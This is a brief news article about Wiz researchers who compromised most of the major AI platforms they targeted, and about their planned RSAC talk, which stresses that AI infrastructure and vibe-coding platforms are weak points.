Two years ago, Hillai Ben Sasson and Dan Segev set out to hack AI infrastructure in the hopes of discovering vulnerabilities. However, they were surprised to discover that they had compromised almost all of the major AI platforms they targeted. The two researchers wanted to test their theories on how to attack the AI infrastructure being implemented as part of foundational models, AI services, and internal AI projects.
They are employed by cloud-security company Wiz, where they work in offensive and defensive research, respectively. However, what began as straightforward attacks on the AI supply chain, like misusing the popular Pickle format to execute arbitrary code, developed into a thorough threat analysis covering five different AI stack layers.
At the forthcoming RSAC Conference in March, they intend to share the insights they have gained from their two years of research. Possibly the most crucial lesson: Segev, a security architect in Wiz's Office of the CTO, advises concentrating on the infrastructure that is used to host, train, and operate AI services rather than on prompt-injection attacks. ## The Inadequate Security of Vibe Coding The application layer, which is the third level, has problems with vibe coding platforms like Base44 in addition to prompt injection.
Researchers at Wiz discovered a flaw that might have given hackers access to any private enterprise application. Segev claims that the vibe-coding platforms actually have a bad security record.
Related: A Nation-State Goldmine: Dell's Hard-Coded Flaw He claims, "We don't have exact numbers, but we were able to hack almost every vibe-coded app we set out to look for in minutes." In actuality, "AI security is — I don't want to say broken — but it's really compromised at the infrastructure layer." Additionally, the researchers added two more layers to their model.


.webp%3Fw%3D696%26resize%3D696%2C0%26ssl%3D1&w=3840&q=75)

.webp&w=3840&q=75)



%2520(1).webp&w=3840&q=75)
%2520(1).webp&w=3840&q=75)


